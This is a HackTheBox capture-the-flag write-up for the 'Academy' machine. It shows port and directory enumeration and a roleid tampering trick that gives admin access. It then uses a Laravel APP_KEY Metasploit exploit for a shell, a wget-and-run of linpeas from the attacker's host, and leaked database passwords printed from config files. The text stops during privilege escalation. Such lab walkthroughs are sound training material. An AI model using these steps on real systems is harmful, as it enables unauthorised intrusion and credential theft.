Academy — HackTheBox — WriteUp

TonyRahmos

6 min readJan 21, 2021

Hello. I’m Rahmos. Here is my Academy — HackTheBox — WriteUp. Check it out!

1/Enumeration

First add academy.htb to your /etc/hosts, then nmap to see opened ports on this machine:

nmap -A -T4 -p- -v <ip>

There are 3 ports opened: 22(SSH), 80(HTTP) and 33060(mysql).

First, let’s access the website at port 80:

I’ve checked the page source (Ctrl + U), but nothing valuable. Next, scan for hidden dirs using gobuster:

gobuster dir -u http://academy.htb -w /path-to-wordlist

Access /admin:

I need credentials to login. I haven’t known the credential yet, so just register a account and login. I will register an account called “customer”.

After login, I’ve entered the page as “egre55”.

I tried to register another account: “customer2”, and login, and I’m also in as “egre55”. Which means, the website uses cookie (PHPSESSID) for authentication. No matters what account you register, if it’s a non-admin account, it will have the same PHPSESSID. So that, there’s only one non-admin account inside the web’s database: “egre55”.

Let’s take a look again from the register, I’m gonna catch the request with Burpsuite. I will register another account, called “admin3”. Here’s the request in Burp:

Ok so the “roleid” is which I need to manipulate. In the database, it will look like this:

non-admin: roleid=0
admin: roleid=1

So I will change the “roleid” to 1 and forward the request. Then, access /admin.php and login with the account I’ve just registered:

And yes! I’m in the admin-page! Look at the last line, I’ve known another subdomain, and this subdomain has some issue. So let’s add this subdomain into your /etc/hosts, and access it. Here is the dev page:

Scroll down and look closely, I’ve seen some sensitive information:

The app name is “Laravel”. Look on Google for exploit and I’ve found a Metasploit module. Let’s go ahead and “msfconsole”!

search laravel

Use it. Type “options” to set needed field, and what you need to set is:

APP_KEY: paste the app key in the dev page above
RHOSTS: the machine’s ip
RPORT: The website’s port
LHOST: Your VPN-ip
LPORT: your listener port
VHOST: the subdomain name

After everything is set, “run”

I’ve got the shell into the machine! Spawn a tty shell using python:

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
export TERM=xterm

2/ User flag

Move around to view users:

Ok so there’re 7 users (include root).

The user.txt flag will be inside cry0l1t3 folder:

However, I cannot read it right now due to permission. So I have to find a way to be cry0l1t3.

Let’s try login to mysql with the credential I found:

Well look likes I don’t have the permission to mysql. Next, I’ll transfer the “linpeas” script to enum the machine.

First, start a http server on your machine:

python3 -m http.server 9000

Then from the target machine, cd /tmp and:

wget http://<your-VPN-ip>:9000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

Read the result. Scroll down and you’ll see more sensitive information:

After a while, I’ve found another mysql credential inside /var/www/html/academy/.env: mySup3rP4s5w0rd!!

Try to login with that credential but still not working! 😐

Enum and enum again, finally I found the mysql’s credential for root inside /var/www/html/academy/public/config.php: GkEWXn4h34g8qx9fZ1

Put all the hashes to crackstation to decrypt:

However, it’s only the password for web’s users, not what I’m looking for. I’m really stuck here… 😣

Take a look again, the password: mySup3rP4s5w0rd!! cannot be used to login to mysql, but let’s try to su cry0l1t3 with this password? Why not?